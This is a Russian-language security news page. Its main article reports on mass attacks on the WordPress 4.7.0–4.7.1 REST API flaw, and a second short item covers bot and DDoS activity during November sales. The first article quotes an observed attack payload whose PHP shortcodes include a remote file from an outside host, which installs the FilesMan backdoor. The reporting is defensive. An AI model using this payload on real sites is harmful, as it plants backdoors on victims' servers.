Атаки на уязвимость в WordPress REST API нужны для установки бэкдоров

Атаки на уязвимость в WordPress REST API нужны для установки бэкдоров

Атаки на уязвимость в WordPress REST API нужны для установки бэкдоров

Массовые атаки на свежую уязвимость в WordPress REST API, исправленную в конце января 2017 года, продолжаются. На прошлой неделе мы рассказывали, что по данным компании WordFence, уязвимость привлекла внимание как минимум 20 хакерских групп, которым удалось скомпрометировать более 1,5 млн страниц.

В настоящий момент количество пострадавших страниц перевалило за два миллиона, а атаки постепенно становятся серьезнее, как и прогнозировали специалисты.

Напомню, что свежая уязвимость была устранена с выходом WordPress 4.7.2, еще 26 января 2017 года. Баг обнаружили специалисты компании Sucuri, и они описывают его как неавторизованную эскалацию привилегий через REST API. Уязвимости подвержены версии 4.7.0 и 4.7.1. Однако публичное раскрытие информации о проблеме состоялось только неделю спустя, так как разработчики хотели, чтобы как можно больше сайтов спокойно установили обновления, пишет xakep.ru.

Уязвимость позволяет неавторизованному атакующему сформировать специальный запрос, при помощи которого можно будет изменять и удалять содержимое любого поста на целевом сайте. Кроме того, используя шорткоды плагинов, злоумышленник может эксплуатировать и другие уязвимости CMS, которые обычно недоступны даже пользователям с высокими привилегиями. В итоге атакующий может внедрить на страницы сайта SEO-спам, рекламу, и даже исполняемый PHP-код, все зависит от доступных плагинов.

Эксперты компании Sucuri заметили, что от простых дефейсов злоумышленники перешли к попыткам удаленного выполнения произвольного кода. Для этих целей хакеры используют плагины Insert PHP (100 000+ установок), Exec-PHP (100 000+ установок) и им подобные. Такие плагины позволяют внедрять PHP-код в посты, чтобы сделать кастомизацию проще.

Исследователи пишут, что теперь дефейс-сообщения хакеров содержат шорткоды для вышеупомянутых плагинов. То есть добавив к своим дефейсам PHP-код, злоумышленники могут добиться его выполнения. В блоге компании эксперты приводят следующий пример, замеченный ими в ходе изучения атак:

content:»[insert_php] include(‘http[:]//acommeamour.fr/tmp/xx.php’); [/insert_php]
[php] include(‘http[:]//acommeamour.fr/tmp/xx.php’); [/php]»,
«id»:»61a»}

Данный пример приводит к скачиванию бэкдора FilesMan и его установке в директорию /wp-content/uploads/.

Теперь специалисты Sucuri рекомендуют администраторам отключить все потенциально опасные плагины и обновиться до WordPress 4.7.2, если они по какой-то причине еще этого не сделали. Исследователи поясняют, что такие атаки – это способ монетизации уязвимости. Тогда как обычными дефейсами много не заработаешь, размещение бекдора на сервере жертвы позволяет злоумышленникам вернуться позже, даже после устранения оригинальной уязвимости, и разместить на скомпрометированном ресурсе SEO-спам, рекламу или малварь.

Anti-Malware Яндекс ДзенПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Период распродаж сопровождался ростом активности DDoS и ботов

Киберпреступники не обошли стороной известный день распродаж — 11 ноября. Злонамеренная активность превышала легитимную почти на два порядка. Особенно интенсивно атаковали крупных ретейлеров.

В текущем году активность покупателей перед «Днем холостяка» 11 ноября, когда многие компании открывают сезон скидок, превышала среднюю в 2-3 раза. Но еще больше росла активность ботов.

Руководитель аналитического отдела Servicepipe Антон Чемякин сообщил «Известиям», что максимальная мощность атаки на один из российских маркетплейсов достигала 3,5 млн запросов в минуту, что в 50 раз превысило легитимную активность даже с учетом пиковой загрузки. DDoS-атаки на ретейлеров уже давно стали неотъемлемой частью сезона распродаж.

Активность ботов он связал с деятельностью конкурентов, которые собирали и структурировали информацию о товарном предложении и ценах. Подобная деятельность началась до старта активных распродаж.

Однако только сбором данных «ботоводы» не ограничивались. Директор платформы облачной киберзащиты Solar Space ГК «Солар» Артем Избаенков привел такой пример активности ботов незадолго до начала распродаж, с конца октября:

«Боты атакуют интернет-магазины разными способами. Например, создают ложные заявки на бронь товара, закидывают горячие линии спам-звонками и массово заполняют формы обратной связи на сайтах, имитируя высокий спрос. Такая ситуация не оставляет небольшим компаниям времени на обработку настоящих заказов, что, в свою очередь, полностью останавливает рабочие процессы».

Использовали ажиотаж перед сезоном распродаж и организаторы фишинговых кампаний. Их активность, по данным экспертов, опрошенных «Известиями», выросла в среднем в 5 раз.

Anti-Malware Яндекс ДзенПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru